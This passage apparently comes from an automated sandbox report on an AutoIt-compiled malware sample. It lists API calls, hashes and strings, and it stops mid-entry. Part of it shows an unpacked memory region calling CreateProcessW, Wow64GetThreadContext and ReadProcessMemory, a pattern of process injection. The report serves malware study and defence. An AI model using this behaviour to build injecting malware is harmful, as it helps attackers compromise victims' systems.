                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0080380B
                                            • CreatePopupMenu.USER32 ref: 0080381F
                                            • PostQuitMessage.USER32(00000000), ref: 0080382E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                            • String ID: TaskbarCreated
                                            • API String ID: 129472671-2362178303
                                            • Opcode ID: 6f96377cf9f93c426e01d7752cdf1764dff346dbbd30a5e8af450a84bac5926c
                                            • Instruction ID: eea21b72a858aba966b9718ab1d3735f59c1c6d620d1eba388751a51ea9902b8
                                            • Opcode Fuzzy Hash: 6f96377cf9f93c426e01d7752cdf1764dff346dbbd30a5e8af450a84bac5926c
                                            • Instruction Fuzzy Hash: C741E1F120464EABDF649B6CAC8EF7A366DFB41700F044539FA02D21D2DA70DE509762

                                            Control-flow Graph

                                            APIs
                                            • GetSysColorBrush.USER32(0000000F), ref: 00803E79
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00803E88
                                            • LoadIconW.USER32(00000063), ref: 00803E9E
                                            • LoadIconW.USER32(000000A4), ref: 00803EB0
                                            • LoadIconW.USER32(000000A2), ref: 00803EC2
                                              • Part of subcall function 00804024: LoadImageW.USER32(00800000,00000063,00000001,00000010,00000010,00000000), ref: 00804048
                                            • RegisterClassExW.USER32(?), ref: 00803F30
                                              • Part of subcall function 00803F53: GetSysColorBrush.USER32(0000000F), ref: 00803F86
                                              • Part of subcall function 00803F53: RegisterClassExW.USER32(00000030), ref: 00803FB0
                                              • Part of subcall function 00803F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00803FC1
                                              • Part of subcall function 00803F53: InitCommonControlsEx.COMCTL32(?), ref: 00803FDE
                                              • Part of subcall function 00803F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00803FEE
                                              • Part of subcall function 00803F53: LoadIconW.USER32(000000A9), ref: 00804004
                                              • Part of subcall function 00803F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00804013
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                            • String ID: #$0$AutoIt v3
                                            • API String ID: 423443420-4155596026
                                            • Opcode ID: 525606e33284b38369a2a29d55a235e6d5fb436675d7906f31484c98f58d8bf8
                                            • Instruction ID: bc1f34500a73841c1af77105024a5d6a28b230bd050853a3266c4f5d256d5ced
                                            • Opcode Fuzzy Hash: 525606e33284b38369a2a29d55a235e6d5fb436675d7906f31484c98f58d8bf8
                                            • Instruction Fuzzy Hash: E12139B0E00304AFDF40DFA9EC89E99BBF5FB49314F14522AE618E22A1D77586548F91

                                            Control-flow Graph

                                            • Rendered graph not reproduced in text; entry block 82acb3-82ace0, with blocks calling GetStartupInfoW, GetStdHandle, GetFileType and InitializeCriticalSectionAndSpinCount
                                            APIs
                                            • __lock.LIBCMT ref: 0082ACC1
                                              • Part of subcall function 00827CF4: __mtinitlocknum.LIBCMT ref: 00827D06
                                              • Part of subcall function 00827CF4: EnterCriticalSection.KERNEL32(00000000,?,00827ADD,0000000D), ref: 00827D1F
                                            • __calloc_crt.LIBCMT ref: 0082ACD2
                                              • Part of subcall function 00826986: __calloc_impl.LIBCMT ref: 00826995
                                              • Part of subcall function 00826986: Sleep.KERNEL32(00000000,000003BC,0081F507,?,0000000E), ref: 008269AC
                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0082ACED
                                            • GetStartupInfoW.KERNEL32(?,008B6E28,00000064,00825E91,008B6C70,00000014), ref: 0082AD46
                                            • __calloc_crt.LIBCMT ref: 0082AD91
                                            • GetFileType.KERNEL32(00000001), ref: 0082ADD8
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0082AE11
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                            • String ID:
                                            • API String ID: 1426640281-0
                                            • Opcode ID: e8c70d03b2d31fec8920ba1090539b08f76b7b38ecf0a0b83c0ad2103b41ac8c
                                            • Instruction ID: 176e36efc338af870801803b60edbcf5e7b8092140972096578741263fc78165
                                            • Opcode Fuzzy Hash: e8c70d03b2d31fec8920ba1090539b08f76b7b38ecf0a0b83c0ad2103b41ac8c
                                            • Instruction Fuzzy Hash: 8781B1B19053658FDB18CF68E9805A9BBF0FF05324B24425DD4A6EB3D1D7349883CB56

                                            Control-flow Graph

                                            • Rendered graph not reproduced in text; entry block 11b3100-11b31ae, with blocks calling CreateFileW, VirtualAlloc, ReadFile, CloseHandle and VirtualFree
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 011B31D1
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 011B33F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateFileFreeVirtual
                                            • String ID:
                                            • API String ID: 204039940-0
                                            • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                            • Instruction ID: a7ddfd5aa6934e2759f8af2b99d004e5ba1b61fb7b6bd2eb23c571c8d9bdd712
                                            • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                            • Instruction Fuzzy Hash: 78A12870E15209EBDB18CFA4C894BEEBBB5FF48304F208159E211BB291CB759A54CF55

                                            Control-flow Graph

                                            • Rendered graph not reproduced in text; entry block 8049fb-804a25, with blocks calling RegOpenKeyExW, RegQueryValueExW and RegCloseKey
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00804A1D
                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008741DB
                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0087421A
                                            • RegCloseKey.ADVAPI32(?), ref: 00874249
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: QueryValue$CloseOpen
                                            • String ID: Include$Software\AutoIt v3\AutoIt
                                            • API String ID: 1586453840-614718249
                                            • Opcode ID: e5cc91841bbb29802ce983d6287ae853735b07e66191d92c860115d550eb708a
                                            • Instruction ID: d462da95d565e274b742a42d10f4925cdf909b84595f87fc13ecfef5586d1d1c
                                            • Opcode Fuzzy Hash: e5cc91841bbb29802ce983d6287ae853735b07e66191d92c860115d550eb708a
                                            • Instruction Fuzzy Hash: A5116DB1600209BEEB04ABA8CD86DBF7BACFF04344F005054B506D6191EB709E41DB54

                                            Control-flow Graph

                                            • Rendered graph not reproduced in text; single block 8036b8-803728 calling CreateWindowExW twice and ShowWindow twice
                                            APIs
                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008036E6
                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00803707
                                            • ShowWindow.USER32(00000000,?,?,?,?,00803AA3,?), ref: 0080371B
                                            • ShowWindow.USER32(00000000,?,?,?,?,00803AA3,?), ref: 00803724
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$CreateShow
                                            • String ID: AutoIt v3$edit
                                            • API String ID: 1584632944-3779509399
                                            • Opcode ID: 146569d736dab235cadc25d1f9179ce7e0bd7295d8e514dcb1d832771fe5f6b9
                                            • Instruction ID: f4abfdb152fcfc292a617cb99444d90f05cbbe2a9574a43e2814fcc25ad1ba1e
                                            • Opcode Fuzzy Hash: 146569d736dab235cadc25d1f9179ce7e0bd7295d8e514dcb1d832771fe5f6b9
                                            • Instruction Fuzzy Hash: 98F0DA716406D07AEB316767AC8CE672EBDFBC7F20F00001ABA04A21A1C57508A5DAB0

                                            Control-flow Graph

                                            • Rendered graph not reproduced in text; entry block 11b2ed0-11b2ffc, with blocks calling CreateFileW, VirtualAlloc, ReadFile and ExitProcess
                                            APIs
                                              • Part of subcall function 011B2DC0: Sleep.KERNELBASE(000001F4), ref: 011B2DD1
                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011B2FF2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateFileSleep
                                            • String ID: R46IXDPE0DC3RD
                                            • API String ID: 2694422964-320771854
                                            • Opcode ID: 188fa75b469ef0f7ea6aca161075fdb85471ef6e0922e4a59cf8c263b14df007
                                            • Instruction ID: a7f9244f76bec0b1e7ea20ccc8820c9de9a13d9c552c1ea5c7c025917dd81bd0
                                            • Opcode Fuzzy Hash: 188fa75b469ef0f7ea6aca161075fdb85471ef6e0922e4a59cf8c263b14df007
                                            • Instruction Fuzzy Hash: 06519030D14249EBEF15DBA4D854BEFBB79AF08300F004599E619BB2C0D7791B49CBA6
                                            APIs
                                            • _memset.LIBCMT ref: 0080522F
                                            • _wcscpy.LIBCMT ref: 00805283
                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00805293
                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00873CB0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                            • String ID: Line:
                                            • API String ID: 1053898822-1585850449
                                            • Opcode ID: 3b601685694298f6950fb38167535b768570fce8a401eee61bdfd7279af0148a
                                            • Instruction ID: 86460ec410a918c34526aa754f8c1b609cf8a7ce27c522a45ca9b088600a23fa
                                            • Opcode Fuzzy Hash: 3b601685694298f6950fb38167535b768570fce8a401eee61bdfd7279af0148a
                                            • Instruction Fuzzy Hash: EB31CE71008740AED760EB64EC86FDB77E8FF45310F00451AF599D21D2EB74A6588BA7
                                            APIs
                                              • Part of subcall function 008041A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008039FE,?,00000001), ref: 008041DB
                                            • _free.LIBCMT ref: 008736B7
                                            • _free.LIBCMT ref: 008736FE
                                              • Part of subcall function 0080C833: __wsplitpath.LIBCMT ref: 0080C93E
                                              • Part of subcall function 0080C833: _wcscpy.LIBCMT ref: 0080C953
                                              • Part of subcall function 0080C833: _wcscat.LIBCMT ref: 0080C968
                                              • Part of subcall function 0080C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0080C978
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                            • API String ID: 805182592-1757145024
                                            • Opcode ID: 0e557d7bc983a1c3235bcde6a68e847f211537f725a536f4737657654b35100f
                                            • Instruction ID: e58097c17bbfea3b4692f5c9376231f45ad660d4ea04df35d1d0a075190684aa
                                            • Opcode Fuzzy Hash: 0e557d7bc983a1c3235bcde6a68e847f211537f725a536f4737657654b35100f
                                            • Instruction Fuzzy Hash: 6D914C71910219AFCF04EFA8CC919EEB7B4FF18314B148429F516EB295DB34EA44DB52
                                            APIs
                                              • Part of subcall function 00805374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008C1148,?,008061FF,?,00000000,00000001,00000000), ref: 00805392
                                              • Part of subcall function 008049FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00804A1D
                                            • _wcscat.LIBCMT ref: 00872D80
                                            • _wcscat.LIBCMT ref: 00872DB5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscat$FileModuleNameOpen
                                            • String ID: \$\Include\
                                            • API String ID: 3592542968-2640467822
                                            • Opcode ID: c9f0f26f1ccbe5aa708b1922b264be5beae6289612e02532b705507aeb2e1195
                                            • Instruction ID: e5d1cea7913f47e41ed549c3c65059a2b88e70e569b3c800567e16993df89765
                                            • Opcode Fuzzy Hash: c9f0f26f1ccbe5aa708b1922b264be5beae6289612e02532b705507aeb2e1195
                                            • Instruction Fuzzy Hash: 8A5159B14043449FC754EF59EC9289AB7F8FB59310B48452FF649C32E1EB70AA48CB52
                                            APIs
                                            • __getstream.LIBCMT ref: 008234FE
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 00823539
                                            • __wopenfile.LIBCMT ref: 00823549
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                            • String ID: <G
                                            • API String ID: 1820251861-2138716496
                                            • Opcode ID: 94ac6a9c41b4be41fcafe77ac0331141344cab20787579279f5037453f0cee7c
                                            • Instruction ID: 9d014b8bea622ef9e996cd5c149182855e462f921cefd8b8af059b98d6ef6f92
                                            • Opcode Fuzzy Hash: 94ac6a9c41b4be41fcafe77ac0331141344cab20787579279f5037453f0cee7c
                                            • Instruction Fuzzy Hash: 93110D70A002359FDB11BF79BC4266E36E4FF05350B148965E815D7281FB38CAD19762
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0081D28B,SwapMouseButtons,00000004,?), ref: 0081D2BC
                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0081D28B,SwapMouseButtons,00000004,?,?,?,?,0081C865), ref: 0081D2DD
                                            • RegCloseKey.KERNELBASE(00000000,?,?,0081D28B,SwapMouseButtons,00000004,?,?,?,?,0081C865), ref: 0081D2FF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID: Control Panel\Mouse
                                            • API String ID: 3677997916-824357125
                                            • Opcode ID: 414301eb4af7a26bdcdbccb18013644e3829c89974b3156d6b3c44f405e4752a
                                            • Instruction ID: 05b331b80eba0ef06f32643c3dcad6767d1f78b502cfacb10822b99588b7f5dc
                                            • Opcode Fuzzy Hash: 414301eb4af7a26bdcdbccb18013644e3829c89974b3156d6b3c44f405e4752a
                                            • Instruction Fuzzy Hash: 28112375611308FFDB218FA8CC84EEF7BBCFF44754B104869A815D7250E631AE81AB60
                                            APIs
                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 011B257B
                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011B2611
                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011B2633
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                            • String ID:
                                            • API String ID: 2438371351-0
                                            • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                            • Instruction ID: 79d4411f6b0b9909eb1fc8c01c192d57950a407e7e15f4f78c1c9f2e84925fe9
                                            • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                            • Instruction Fuzzy Hash: 71620D30A14658DBEB28CFA4C890BDEB772EF58300F1091A9D10DEB394E7759E85CB59
                                            APIs
                                              • Part of subcall function 00804517: _fseek.LIBCMT ref: 0080452F
                                              • Part of subcall function 0084C56D: _wcscmp.LIBCMT ref: 0084C65D
                                              • Part of subcall function 0084C56D: _wcscmp.LIBCMT ref: 0084C670
                                            • _free.LIBCMT ref: 0084C4DD
                                            • _free.LIBCMT ref: 0084C4E4
                                            • _free.LIBCMT ref: 0084C54F
                                              • Part of subcall function 00821C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00827A85), ref: 00821CB1
                                              • Part of subcall function 00821C9D: GetLastError.KERNEL32(00000000,?,00827A85), ref: 00821CC3
                                            • _free.LIBCMT ref: 0084C557
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                            • String ID:
                                            • API String ID: 1552873950-0
                                            • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                            • Instruction ID: 91c0fb465342a4069c0e737c223797702de9d638140a0248b39b6722a39102ec
                                            • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                            • Instruction Fuzzy Hash: 09514CB5905218AFDF549F68DC81AADBBB9FF48304F1000AEB259E3291DB715A80CF59
                                            APIs
                                            • _memset.LIBCMT ref: 0081EBB2
                                              • Part of subcall function 008051AF: _memset.LIBCMT ref: 0080522F
                                              • Part of subcall function 008051AF: _wcscpy.LIBCMT ref: 00805283
                                              • Part of subcall function 008051AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00805293
                                            • KillTimer.USER32(?,00000001,?,?), ref: 0081EC07
                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0081EC16
                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00873C88
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                            • String ID:
                                            • API String ID: 1378193009-0
                                            • Opcode ID: 0e9166361df8dd1d047207e7bd07fcc3ea66feda58df47a01a71dd69225847f8
                                            • Instruction ID: 2fd20304bd2e9edb2b85bd9c32deb2f22da51e3814f70d633d64125a021139f7
                                            • Opcode Fuzzy Hash: 0e9166361df8dd1d047207e7bd07fcc3ea66feda58df47a01a71dd69225847f8
                                            • Instruction Fuzzy Hash: EB21B3705047949FE7339B288C59BE6BBECFF51308F04048DE68EA6186C3746A848B52
                                            APIs
                                            • _memset.LIBCMT ref: 00873725
                                            • GetOpenFileNameW.COMDLG32 ref: 0087376F
                                              • Part of subcall function 0080660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008053B1,?,?,008061FF,?,00000000,00000001,00000000), ref: 0080662F
                                              • Part of subcall function 008040A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008040C6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Name$Path$FileFullLongOpen_memset
                                            • String ID: X
                                            • API String ID: 3777226403-3081909835
                                            • Opcode ID: 069e5c08fea832e964710ac4f387d55aaa547307e1967e138aa3068c5fcb20ec
                                            • Instruction ID: 4b6bfa3d8ad5bc806264f7b8ab4e5fef56260ff0412470b27a702d2eeb0cd4a2
                                            • Opcode Fuzzy Hash: 069e5c08fea832e964710ac4f387d55aaa547307e1967e138aa3068c5fcb20ec
                                            • Instruction Fuzzy Hash: E62184B1A102589BDB419FD8DC45BDE7BF8FF49304F004069E505E7281DBB49A898F66
                                            APIs
                                            • GetTempPathW.KERNEL32(00000104,?), ref: 0084C72F
                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0084C746
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
